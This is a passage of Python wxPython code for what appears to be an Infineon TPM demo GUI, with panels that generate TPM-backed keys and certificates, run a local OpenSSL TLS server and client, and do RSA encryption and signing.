global RSA_Server_thread_active_flag,RSA_Client_thread_active_flag
if (server_proc is not None):
RSA_Server_thread_active_flag=0
if (client_proc is not None):
RSA_Client_thread_active_flag=0
print("Client Thread Active..killing it: %d \n" % client_proc.pid)
kill_child_processes(client_proc.pid)
client_proc.terminate()
client_proc.wait()
client_proc = None
print("Server Thread Active..killing it: %d \n" % server_proc.pid)
kill_child_processes(server_proc.pid)
#server_proc.stdin.write("stop\n")
#server_thread.raise_exception()
#server_thread.join()
server_proc.terminate()
server_proc.wait()
server_proc = None
else:
#server_proc = exec_cmd.createProcess("lxterminal --title=Server --geometry=55x24 --command='openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss'", server_log)
if (exec_cmd.ownerAuth !=""):
openssl_cmd="OPENSSL_CONF=temp.conf openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss"
else:
openssl_cmd="openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss"
server_proc = exec_cmd.createProcess(openssl_cmd, server_log)
server_thread = RSA_Server_Thread(1, server_proc)
server_thread.start()
wx.CallAfter(Publisher.sendMessage, "Server_Text", msg="\n\n" + openssl_cmd +"\n\n")
def OnStartClient(self, evt):
global client_proc,client_log,server_proc
global RSA_Client_thread_active_flag,RSA_Server_thread_active_flag
if (client_proc is not None):
RSA_Client_thread_active_flag=0
print("Client Thread Active..killing it: %d \n" % client_proc.pid)
kill_child_processes(client_proc.pid)
client_proc.terminate()
client_proc.wait()
client_proc = None
else:
#client_proc = exec_cmd.createProcess("lxterminal --title=Server --geometry=55x24 --command='openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss'", server_log)
openssl_cmd="openssl s_client -connect localhost:4433 -tls1_2 -CAfile CA_rsa_cert.pem"
if (server_proc is not None):
client_proc = exec_cmd.createProcess(openssl_cmd, client_log)
client_thread = RSA_Client_Thread(2, client_proc)
client_thread.start()
wx.CallAfter(Publisher.sendMessage, "Client_Text", msg="\n\n" +openssl_cmd+"\n\n")
else:
wx.CallAfter(Publisher.sendMessage, "Client_Text", msg="Server is not active..\n")
def OnWriteServer(self, evt):
global server_proc
if (server_proc is None):
self.text_server.AppendText("Server is not running!\n")
return
write_value = self.input_server.GetValue()
if (write_value == ""):
self.text_server.AppendText("I need something to write!\n")
return
server_proc.stdin.write((write_value+"\n").encode())
server_proc.stdin.flush()
def OnWriteClient(self, evt):
global client_proc
if (client_proc is None):
self.text_client.AppendText("Client is not running!\n")
return
write_value = self.input_client.GetValue()
if (write_value == ""):
self.text_client.AppendText("I need something to write!\n")
return
client_proc.stdin.write((write_value+"\n").encode())
client_proc.stdin.flush()
class Tab_ECC_CS(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# declare the sizers
mainsizer = wx.BoxSizer(wx.HORIZONTAL)
steps_sizer = wx.BoxSizer(wx.VERTICAL)
server_sizer = wx.BoxSizer(wx.VERTICAL)
client_sizer = wx.BoxSizer(wx.VERTICAL)
# instantiate the objects
button_gen_ca = wx.Button(self, -1, 'Generate CA && CA Cert', size = (-1, 48))
button_gen_keypair = wx.Button(self, -1, 'Create Keypair (for server)', size = (-1, 48))
button_gen_csr = wx.Button(self, -1, 'Create CSR', size = (-1, 48))
button_gen_cert = wx.Button(self, -1, 'Create Server Cert', size = (-1, 48))
button_start_server = wx.Button(self, -1, 'Start/Stop Server')
button_start_client = wx.Button(self, -1, 'Start/Stop Client')
button_write_from_server = wx.Button(self, -1, 'Write to Client')
button_write_from_client = wx.Button(self, -1, 'Write to Server')
button_flush_client = wx.Button(self, -1, 'Clear client text', size = (-1, 48))
button_flush_server = wx.Button(self, -1, 'Clear server text', size = (-1, 48))
self.text_client = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY))
self.text_server = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY))
self.text_client.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
self.text_server.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
self.input_client = wx.TextCtrl(self, -1,value="Send from Client")
self.input_server = wx.TextCtrl(self, -1,value="Send from Server")
backimage = wx.Image('../images/back.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
backbutton = wx.BitmapButton(self, -1, backimage)
# ~backbutton = wx.BitmapButton(self, -1, img.back.getBitmap())
# attach the objects to the sizers
mainsizer.Add(steps_sizer, 0, wx.EXPAND | wx.LEFT | wx.TOP | wx.BOTTOM, 5)
mainsizer.Add(server_sizer, 1, wx.EXPAND | wx.RIGHT | wx.TOP | wx.BOTTOM, 5)
mainsizer.Add(client_sizer, 1, wx.EXPAND | wx.RIGHT | wx.TOP | wx.BOTTOM, 5)
steps_sizer.Add(button_gen_ca, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_gen_keypair, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_gen_csr, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_gen_cert, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_flush_server, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.Add(button_flush_client, 0, wx.EXPAND | wx.ALL, 5)
steps_sizer.AddSpacer(236)
steps_sizer.Add(backbutton, 0, wx.ALL, 5)
server_sizer.Add(self.text_server, 1, wx.EXPAND | wx.ALL, 5)
server_sizer.Add(button_start_server, 0, wx.EXPAND | wx.ALL, 5)
server_sizer.Add(self.input_server, 0, wx.EXPAND | wx.ALL, 5)
server_sizer.Add(button_write_from_server, 0, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(self.text_client, 1, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(button_start_client, 0, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(self.input_client, 0, wx.EXPAND | wx.ALL, 5)
client_sizer.Add(button_write_from_client, 0, wx.EXPAND | wx.ALL, 5)
# Set tooltips
button_gen_ca.SetToolTip(wx.ToolTip("Generate Key Pair and Self-Signed Certificate for the Certificate Authority (CA)."))
button_gen_keypair.SetToolTip(wx.ToolTip("Generate Key Pair for the Server."))
button_gen_csr.SetToolTip(wx.ToolTip("Generate Certificate Signing Request (CSR) for the CA, from the Server's private key."))
button_gen_cert.SetToolTip(wx.ToolTip("Generate Server Certificate from the CSR and the CA's private key."))
# declare and bind events
self.Bind(wx.EVT_BUTTON, self.OnFlushClient, button_flush_client)
self.Bind(wx.EVT_BUTTON, self.OnFlushServer, button_flush_server)
self.Bind(wx.EVT_BUTTON, self.OnGenCA1, button_gen_ca)
self.Bind(wx.EVT_BUTTON, self.OnGenKeyPair1, button_gen_keypair)
self.Bind(wx.EVT_BUTTON, self.OnGenCSR1, button_gen_csr)
self.Bind(wx.EVT_BUTTON, self.OnGenCert, button_gen_cert)
self.Bind(wx.EVT_BUTTON, self.OnStartServer, button_start_server)
self.Bind(wx.EVT_BUTTON, self.OnStartClient, button_start_client)
self.Bind(wx.EVT_BUTTON, self.OnWriteServer, button_write_from_server)
self.Bind(wx.EVT_BUTTON, self.OnWriteClient, button_write_from_client)
self.Bind(wx.EVT_BUTTON, self.OnBack, backbutton)
# Setup Publisher for text field update
Publisher.subscribe(self.Upd_Server_Status, "ECC_Server_Text")
Publisher.subscribe(self.Upd_Client_Status, "ECC_Client_Text")
self.SetSizer(mainsizer)
# declare threads related parameters
self.Server_thread_active_flag=0
self.Client_thread_active_flag=0
self.server_proc=None
self.client_proc=None
def server_thread(self):
try:
while self.Server_thread_active_flag==1 :
line = self.server_proc.stdout.readline()
if line != '':
wx.CallAfter(Publisher.sendMessage, "ECC_Server_Text", msg=line)
finally:
self.Server_thread_active_flag=0
print("Exit ECC server Thread\n")
wx.CallAfter(Publisher.sendMessage, "ECC_Server_Text", msg="Server Stopped..\n")
def client_thread(self):
while self.Client_thread_active_flag==1 :
line = self.client_proc.stdout.readline()
if line != '':
wx.CallAfter(Publisher.sendMessage, "ECC_Client_Text", msg=line)
self.Client_thread_active_flag=0
print("Exit ECC client Thread\n")
wx.CallAfter(Publisher.sendMessage, "ECC_Client_Text", msg="Client Stopped..\n")
def Upd_Server_Status(self,msg):
self.text_server.AppendText(msg)
def Upd_Client_Status(self,msg):
self.text_client.AppendText(msg)
def OnBack(self, evt):
#~ if (self.server_proc is not None):
#~ self.Server_thread_active_flag=0
#~ if (self.client_proc is not None):
#~ self.Client_thread_active_flag=0
#~ print "Client Thread Active..killing it: %d \n" % self.client_proc.pid
#~ kill_child_processes(self.client_proc.pid)
#~ self.client_proc.terminate()
#~ self.client_proc.wait()
#~ self.client_proc = None
#~ print "Server Thread Active..killing it: %d \n" % self.server_proc.pid
#~ kill_child_processes(self.server_proc.pid)
#~ self.server_proc.terminate()
#~ self.server_proc.wait()
#~ self.server_proc = None
self.Parent.Parent.OnCloseWindow(None)
def Destroy(self):
if (self.server_proc is not None):
self.Server_thread_active_flag=0
if (self.client_proc is not None):
self.Client_thread_active_flag=0
print("Client Thread Active..killing it: %d \n" % self.client_proc.pid)
kill_child_processes(self.client_proc.pid)
self.client_proc.terminate()
self.client_proc.wait()
self.client_proc = None
print("Server Thread Active..killing it: %d \n" % self.server_proc.pid)
kill_child_processes(self.server_proc.pid)
self.server_proc.terminate()
self.server_proc.wait()
self.server_proc = None
def OnFlushClient(self, evt):
self.text_client.Clear()
def OnFlushServer(self, evt):
self.text_server.Clear()
def OnGenCA1(self, evt):
self.text_server.AppendText("Generating CA key-pair...\n")
wx.CallLater(10, self.OnGenCA)
def OnGenCA(self):
exec_cmd.execCLI(["rm", "ecc_CA.tss", ])
exec_cmd.execCLI(["rm", "CA_ecc_cert.pem", ])
exec_cmd.execCLI(["rm", "ecc_server.tss", ])
exec_cmd.execCLI(["rm", "server_ecc.csr", ])
exec_cmd.execCLI(["rm", "CAsigned_ecc_cert.crt", ])
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "ecdsa",
"-o",exec_cmd.ownerAuth,
"ecc_CA.tss",
])
self.text_server.AppendText("'tpm2tss-genkey -a ecdsa -o %s ecc_CA.tss'\n" % exec_cmd.ownerAuth)
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
self.text_server.AppendText("Creating Self-Signed Certificate:\n")
command_output = exec_cmd.execCLI([
"openssl",
"req", "-new",
"-config","temp.conf",
"-engine", "tpm2tss",
"-key", "ecc_CA.tss",
"-keyform", "engine",
"-x509", "-sha256",
"-days", "7300",
#~ "-extensions", "v3_ca",
"-subj", "/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA",
"-out", "CA_ecc_cert.pem",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -config temp.conf -key ecc_CA.tss -new -x509 -days 7300 -sha256 -engine tpm2tss -keyform engine -extensions v3_ca -out CA_ecc_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "ecdsa",
"ecc_CA.tss",
])
self.text_server.AppendText("Generating CA key-pair: 'tpm2tss-genkey -a ecdsa ecc_CA.tss'\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
self.text_server.AppendText("Creating Self-Signed Certificate:\n")
command_output = exec_cmd.execCLI([
"openssl",
"req", "-new",
"-engine", "tpm2tss",
"-key", "ecc_CA.tss",
"-keyform", "engine",
"-x509", "-sha256",
"-days", "7300",
#~ "-extensions", "v3_ca",
"-subj", "/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA",
"-out", "CA_ecc_cert.pem",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -key ecc_CA.tss -new -x509 -days 7300 -sha256 -engine tpm2tss -keyform engine -extensions v3_ca -out CA_ecc_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnGenKeyPair1(self, evt):
self.text_server.AppendText("Generating SERVER key-pair...\n")
wx.CallLater(10, self.OnGenKeyPair)
def OnGenKeyPair(self):
if (exec_cmd.ownerAuth !=""):
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "ecdsa",
"-o",exec_cmd.ownerAuth,
"ecc_server.tss",
])
self.text_server.AppendText("'tpm2tss-genkey -a ecdsa -o %s ecc_server.tss'\n" % exec_cmd.ownerAuth)
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "ecdsa",
"ecc_server.tss",
])
self.text_server.AppendText("Generating SERVER key-pair: 'tpm2tss-genkey -a ecdsa ecc_server.tss'\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnGenCSR1(self, evt):
self.text_server.AppendText("Creating Certificate Signing Request...\n")
wx.CallLater(10, self.OnGenCSR)
def OnGenCSR(self):
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
command_output = exec_cmd.execCLI([
"openssl",
"req", "-new",
"-config","temp.conf",
"-engine", "tpm2tss",
"-key", "ecc_server.tss",
"-keyform", "engine",
"-subj", "/CN=TPM_UI/O=Infineon/C=SG",
"-out", "server_ecc.csr",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -new -config temp.conf -engine tpm2tss -key ecc_server.tss -keyform engine -subj /CN=TPM_UI/O=Infineon/C=SG -out server_ecc.csr\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
command_output = exec_cmd.execCLI([
"openssl",
"req", "-new",
"-engine", "tpm2tss",
"-key", "ecc_server.tss",
"-keyform", "engine",
"-subj", "/CN=TPM_UI/O=Infineon/C=SG",
"-out", "server_ecc.csr",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -new -engine tpm2tss -key ecc_server.tss -keyform engine -subj /CN=TPM_UI/O=Infineon/C=SG -out server_ecc.csr\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnGenCert(self, evt):
self.text_server.AppendText("Creating Server Certificate...\n")
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
openssl_cmd="OPENSSL_CONF=temp.conf openssl x509 -req -in server_ecc.csr -CA CA_ecc_cert.pem -CAkey ecc_CA.tss -engine tpm2tss -CAkeyform engine -out CAsigned_ecc_cert.crt -days 365 -sha256 -CAcreateserial"
server_proc = exec_cmd.createProcess(openssl_cmd, server_log)
#~ command_output = exec_cmd.execCLI([
#~ "openssl",
#~ "req", "-x509", "-sha256",
#~ "-config","temp.conf",
#~ "-engine", "tpm2tss",
#~ "-key", "ecc_CA.tss",
#~ "-keyform", "engine",
#~ "-in", "server_ecc.csr",
#~ "-out", "CAsigned_ecc_cert.crt",
#~ ])
#~ self.text_server.AppendText(str(command_output))
self.text_server.AppendText("OPENSSL_CONF=temp.conf openssl x509 -req -in server_ecc.csr -CA CA_ecc_cert.pem -CAkey ecc_CA.tss -engine tpm2tss -CAkeyform engine -out CAsigned_ecc_cert.crt -days 365 -sha256 -CAcreateserial\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
command_output = exec_cmd.execCLI([
"openssl",
"req", "-x509", "-sha256",
"-engine", "tpm2tss",
"-key", "ecc_CA.tss",
"-keyform", "engine",
"-in", "server_ecc.csr",
"-out", "CAsigned_ecc_cert.crt",
])
self.text_server.AppendText(str(command_output))
self.text_server.AppendText("openssl req -x509 -sha256 -key ecc_CA.tss -engine tpm2tss -keyform engine -in server_ecc.csr -out CAsigned_ecc_cert.crt\n")
self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnStartServer(self,evt):
if (self.server_proc is not None):
self.Server_thread_active_flag=0
if (self.client_proc is not None):
self.Client_thread_active_flag=0
print("Client Thread Active..killing it: %d \n" % self.client_proc.pid)
kill_child_processes(self.client_proc.pid)
self.client_proc.terminate()
self.client_proc.wait()
self.client_proc = None
print("Server Thread Active..killing it: %d \n" % self.server_proc.pid)
kill_child_processes(self.server_proc.pid)
self.server_proc.terminate()
self.server_proc.wait()
self.server_proc = None
else:
if (exec_cmd.ownerAuth !=""):
openssl_cmd="OPENSSL_CONF=temp.conf openssl s_server -cert CAsigned_ecc_cert.crt -accept 4432 -keyform engine -engine tpm2tss -key ecc_server.tss"
else:
openssl_cmd="openssl s_server -cert CAsigned_ecc_cert.crt -accept 4432 -keyform engine -engine tpm2tss -key ecc_server.tss"
self.server_proc = exec_cmd.createProcess(openssl_cmd, None)
self.Server_thread_active_flag=1
s_thread = threading.Thread(name='Server-daemon', target=self.server_thread)
s_thread.setDaemon(True)
s_thread.start()
wx.CallAfter(Publisher.sendMessage, "ECC_Server_Text", msg="\n\n" + openssl_cmd +"\n\n")
def OnStartClient(self, evt):
if (self.client_proc is not None):
self.Client_thread_active_flag=0
print("Client Thread Active..killing it: %d \n" % self.client_proc.pid)
kill_child_processes(self.client_proc.pid)
self.client_proc.terminate()
self.client_proc.wait()
self.client_proc = None
else:
#client_proc = exec_cmd.createProcess("lxterminal --title=Server --geometry=55x24 --command='openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss'", server_log)
openssl_cmd="openssl s_client -connect localhost:4432 -tls1_2 -CAfile CA_ecc_cert.pem"
if (self.server_proc is not None):
self.client_proc = exec_cmd.createProcess(openssl_cmd, None)
self.Client_thread_active_flag=1
c_thread = threading.Thread(name='Client-daemon', target=self.client_thread)
c_thread.setDaemon(True)
c_thread.start()
wx.CallAfter(Publisher.sendMessage, "ECC_Client_Text", msg="\n\n" +openssl_cmd+"\n\n")
else:
wx.CallAfter(Publisher.sendMessage, "ECC_Client_Text", msg="Server is not active..\n")
def OnWriteServer(self, evt):
global server_proc
if (self.server_proc is None):
self.text_server.AppendText("Server is not running!\n")
return
write_value = self.input_server.GetValue()
if (write_value == ""):
self.text_server.AppendText("I need something to write!\n")
return
self.server_proc.stdin.write((write_value+"\n").encode())
self.server_proc.stdin.flush()
def OnWriteClient(self, evt):
if (self.client_proc is None):
self.text_client.AppendText("Client is not running!\n")
return
write_value = self.input_client.GetValue()
if (write_value == ""):
self.text_client.AppendText("I need something to write!\n")
return
self.client_proc.stdin.write((write_value+"\n").encode())
self.client_proc.stdin.flush()
class Tab_RSA_MISC(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# declare the sizers
mainsizer = wx.BoxSizer(wx.VERTICAL)
input_sizer = wx.BoxSizer(wx.HORIZONTAL)
button_sizer = wx.BoxSizer(wx.HORIZONTAL)
# instantiate the objects
self.data_input = wx.TextCtrl(self, -1)
data_input_blurb = wx.StaticText(self, -1, "Data Input: ")
self.command_out = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY), size=(500, 500))
self.command_out.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
button_gen_rsakey = wx.Button(self, -1, 'Generate RSA Keypair', size = (-1, 47))
button_rsa_enc = wx.Button(self, -1, 'RSA Encrypt', size = (-1, 47))
button_rsa_dec = wx.Button(self, -1, 'RSA Decrypt', size = (-1, 47))
button_rsa_sign = wx.Button(self, -1, 'RSA Signing', size = (-1, 47))
button_rsa_verify = wx.Button(self, -1, 'RSA Verification', size = (-1, 47))
clearimage = wx.Image('../images/clear.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
clearbutton = wx.BitmapButton(self, -1, clearimage)
# ~clearbutton = wx.BitmapButton(self, -1, img.clear.getBitmap())
backimage = wx.Image('../images/back.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
backbutton = wx.BitmapButton(self, -1, backimage)
# ~backbutton = wx.BitmapButton(self, -1, img.back.getBitmap())
# attach the ui elements to the main sizer
mainsizer.AddSpacer(5)
mainsizer.Add(input_sizer, 0, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
mainsizer.Add(button_sizer, 0, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
mainsizer.Add(self.command_out, 1, wx.EXPAND | wx.TOP, 5)
input_sizer.Add(data_input_blurb, 0, wx.ALIGN_CENTER | wx.ALL, 5)
input_sizer.Add(self.data_input, 1, wx.ALL, 5)
button_sizer.Add(button_gen_rsakey, 1, wx.ALIGN_CENTER | wx.ALL, 5)
button_sizer.Add(button_rsa_enc, 1, wx.ALIGN_CENTER | wx.ALL, 5)
button_sizer.Add(button_rsa_dec, 1, wx.ALIGN_CENTER | wx.ALL, 5)
button_sizer.Add(button_rsa_sign, 1, wx.ALIGN_CENTER | wx.ALL, 5)
button_sizer.Add(button_rsa_verify, 1, wx.ALIGN_CENTER | wx.ALL, 5)
button_sizer.Add(clearbutton, 0, wx.ALL, 5)
button_sizer.Add(backbutton, 0, wx.ALL, 5)
# Set tooltips
button_gen_rsakey.SetToolTip(wx.ToolTip("Generate a RSA key pair."))
button_rsa_enc.SetToolTip(wx.ToolTip("Encrypt the data"))
button_rsa_dec.SetToolTip(wx.ToolTip("Decrypt the data"))
button_rsa_sign.SetToolTip(wx.ToolTip("Sign the data input with the private key"))
button_rsa_verify.SetToolTip(wx.ToolTip("Verify the signature with the public key"))
clearbutton.SetToolTip(wx.ToolTip("Clear all textboxes."))
# declare and bind events
self.Bind(wx.EVT_BUTTON, self.OnClear, clearbutton)
self.Bind(wx.EVT_BUTTON, self.OnGenKey1, button_gen_rsakey)
self.Bind(wx.EVT_BUTTON, self.OnEnc1, button_rsa_enc)
self.Bind(wx.EVT_BUTTON, self.OnDec1, button_rsa_dec)
self.Bind(wx.EVT_BUTTON, self.OnSign1, button_rsa_sign)
self.Bind(wx.EVT_BUTTON, self.OnVerify, button_rsa_verify)
self.Bind(wx.EVT_BUTTON, self.OnBack, backbutton)
self.data_input.write("Hello World")
self.SetSizer(mainsizer)
def OnGenKey1(self, evt):
self.command_out.write("Setting up TPM...\n")
wx.CallLater(10, self.OnGenKey)
def OnGenKey(self):
exec_cmd.execCLI(["rm", "rsa2.tss", ])
exec_cmd.execCLI(["rm", "mycipher", ])
exec_cmd.execCLI(["rm", "mysig", ])
if (exec_cmd.ownerAuth !=""):
command_output = exec_cmd.execCLI([
"tpm2tss-genkey",
"-o",exec_cmd.ownerAuth,
"-a", "rsa",
"rsa2.tss",
])
self.command_out.AppendText(str(command_output))
self.command_out.AppendText("'tpm2tss-genkey -a rsa rsa2.tss' executed \n")
command_output = exec_cmd.execCLI([
"openssl", "rsa",
"-engine", "tpm2tss",
"-inform", "engine",
"-in", "rsa2.tss",
"-pubout",
"-outform", "pem",
"-out", "rsa2.pub",
])
self.command_out.AppendText("'openssl rsa -engine tpm2tss -inform engine -in rsa2.tss -pubout -outform pem -out rsa2.pub' executed \n")
self.command_out.AppendText("rsa.tss contains: \n")
filehandle = open("rsa2.tss", 'r')
self.command_out.AppendText(filehandle.read() + "\n")
filehandle.close()
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
command_output = exec_cmd.execCLI([
"tpm2tss-genkey",
"-a", "rsa",
"rsa2.tss",
])
self.command_out.AppendText(str(command_output))
self.command_out.AppendText("'tpm2tss-genkey -a rsa rsa2.tss' executed \n")
command_output = exec_cmd.execCLI([
"openssl", "rsa",
"-engine", "tpm2tss",
"-inform", "engine",
"-in", "rsa2.tss",
"-pubout",
"-outform", "pem",
"-out", "rsa2.pub",
])
self.command_out.AppendText("'openssl rsa -engine tpm2tss -inform engine -in rsa2.tss -pubout -outform pem -out rsa2.pub' executed \n")
self.command_out.AppendText("rsa.tss contains: \n")
filehandle = open("rsa2.tss", 'r')
self.command_out.AppendText(filehandle.read() + "\n")
filehandle.close()
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnEnc1(self, evt):
self.command_out.write("Encrypting Data...\n")
wx.CallLater(10, self.OnEnc)
def OnEnc(self):
if (self.data_input.GetValue()):
input_data = self.data_input.GetValue()
else:
self.command_out.AppendText("Input data cannot be blank")
return
data_file = open("engine_data.txt", "w")
data_file.write(input_data)
data_file.close()
exec_cmd.execCLI([
"openssl", "pkeyutl",
"-pubin",
"-inkey", "rsa2.pub",
"-in", "engine_data.txt",
"-encrypt",
"-out", "mycipher",
])
self.command_out.AppendText("'openssl pkeyutl -pubin -inkey rsa2.pub -in engine_data.txt -encrypt -out mycipher' executed \n")
self.command_out.AppendText("mycipher contains: \n")
command_output = exec_cmd.execCLI(["xxd", "mycipher", ])
self.command_out.AppendText(command_output + "\n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnDec1(self, evt):
self.command_out.write("Decrypting Data...\n")
wx.CallLater(10, self.OnDec)
def OnDec(self):
if (exec_cmd.ownerAuth !=""):
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
cmd ="OPENSSL_CONF=temp.conf openssl pkeyutl -engine tpm2tss -keyform engine -inkey rsa2.tss -decrypt -in mycipher"
ps_command = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
command_output = ps_command.stdout.read()
retcode = ps_command.wait()
self.command_out.AppendText(str(command_output.decode()))
self.command_out.AppendText("\n' OPENSSL_CONF=temp.conf openssl pkeyutl -engine tpm2tss -keyform engine -inkey rsa2.tss -decrypt -in mycipher' executed \n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
else:
cmd ="openssl pkeyutl -engine tpm2tss -keyform engine -inkey rsa2.tss -decrypt -in mycipher"
ps_command = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
command_output = ps_command.stdout.read()
retcode = ps_command.wait()
self.command_out.AppendText(str(command_output.decode()))
self.command_out.AppendText("\n'openssl pkeyutl -engine tpm2tss -keyform engine -inkey rsa2.tss -decrypt -in mycipher' executed \n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnSign1(self, evt):
self.command_out.write("Signing Data Input with Private Key...\n")
wx.CallLater(10, self.OnSign)
def OnSign(self):
if (self.data_input.GetValue()):
input_data = self.data_input.GetValue()
else:
self.command_out.AppendText("Input data cannot be blank\n")
return
data_file = open("engine_data.txt", "w")
data_file.write(input_data)
data_file.close()
if (exec_cmd.ownerAuth !=""):
#~ exec_cmd.execCLI([
#~ "openssl", "pkeyutl",
#~ "-engine", "tpm2tss",
#~ "-keyform", "engine",
#~ "-inkey", "rsa2.tss",
#~ "-in", "engine_data.txt",
#~ "-sign",
#~ "-out", "mysig",
#~ ])
f = open("temp.conf", "w+")
f.write(exec_cmd.openssl_cnf)
f.close()
cmd ="OPENSSL_CONF=temp.conf openssl pkeyutl -engine tpm2tss -keyform engine -inkey rsa2.tss -sign -in engine_data.txt -out mysig"
else:
cmd ="openssl pkeyutl -engine tpm2tss -keyform engine -inkey rsa2.tss -sign -in engine_data.txt -out mysig"
ps_command = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
command_output = ps_command.stdout.read()
retcode = ps_command.wait()
self.command_out.AppendText(cmd +" executed \n")
self.command_out.AppendText("mysig contains: \n")
command_output = exec_cmd.execCLI(["xxd", "mysig", ])
self.command_out.AppendText(command_output + "\n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnVerify(self, evt):
input_data = self.data_input.GetValue()
if(input_data==""):
self.command_out.AppendText("Input data cannot be blank\n")
return
data_file = open("engine_data.txt", "w")
data_file.write(input_data)
data_file.close()
command_output = exec_cmd.execCLI([
"openssl", "pkeyutl",
"-pubin",
"-inkey", "rsa2.pub",
"-verify",
"-in", "engine_data.txt",
"-sigfile", "mysig",
])
self.command_out.AppendText(str(command_output))
self.command_out.AppendText("'openssl pkeyutl -pubin -inkey rsa2.pub -verify -in engine_data.txt -sigfile mysig' executed \n")
self.command_out.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n")
def OnClear(self, evt):
self.command_out.Clear()
# Calling parent of the parent, as direct parent is the notebook,
# then the second parent is the frame, from which we call the destruction
def OnBack(self, evt):
self.Parent.Parent.OnCloseWindow(None)
class Tab_RNG(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
# declare the sizers
mainsizer = wx.BoxSizer(wx.VERTICAL)
button_sizer = wx.BoxSizer(wx.HORIZONTAL)
# instantiate the objects
button_gen_rng = wx.Button(self, -1, 'Generate RNG', size = (-1, 47))
self.rng_input = wx.TextCtrl(self, -1)
rng_input_blurb = wx.StaticText(self, -1, "No. of bytes to be generated:")
self.command_out = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY))
self.command_out.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL))
rng_type_blurb = wx.StaticText(self, -1, "Pick encoding of Random Number:")
